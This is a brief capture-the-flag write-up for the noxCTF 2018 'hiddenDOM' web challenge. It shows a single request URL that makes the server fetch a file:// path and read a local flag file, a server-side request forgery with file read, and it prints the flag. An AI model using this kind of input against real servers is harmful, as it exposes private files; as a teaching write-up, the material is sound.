Rating:

# noxCTF 2018 : hiddenDOM

**category** : web

**points** : 670

**solves** : 37

## write-up

Server will get the `target` url for us

And use regex `expression` to grep the lines

This will work `http://chal.noxale.com:5588/index.php?target=file:///var/www/html/flag.txt&expression=/.*/`

`noxCTF{/[h1DD3N]*[55Rf]*[r393X]*/}`

# other write-ups and resources

Original writeup (https://github.com/OAlienO/CTF/tree/master/2018/noxCTF/hiddenDOM).